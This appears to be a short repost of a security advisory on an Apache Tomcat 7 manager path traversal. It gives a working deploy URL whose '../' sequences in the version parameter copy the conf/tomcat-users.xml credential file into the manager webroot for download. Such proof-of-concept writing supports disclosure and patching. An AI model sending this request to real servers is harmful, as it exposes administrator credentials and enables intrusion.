Exploit - Apache Tomcat Directory/Path Traversal

Apache Tomcat Directory/Path Traversal

http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/users

Previous URL would copy file named D:/TESTING/Java/run/apache-tomcat- 7.0.76/conf/tomcat-users.xml to destination folder http://localhost/manager/ under the name of users. As we’ve seen in previous code snippets, .xml extension will be added to each file that is copied.
Following image contains browser requesting target URL directly and application response in that case

exploit

As we can see from the previous image, application response is “FAIL - Failed to deploy application at context path /foo##/../../../../webapps/manager/users”, but file is copied anyway.
We can confirm that with direct request for users.xml file in webroot of manager application - http://localhost:8080/manager/users.xml .

exploit successfully

References

http://www.defensecode.com/advisories/DC-2017-03-001_DefenseCode_ThunderScan_SAST_Apache_Tomcat_Security_Advisory.pdf

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值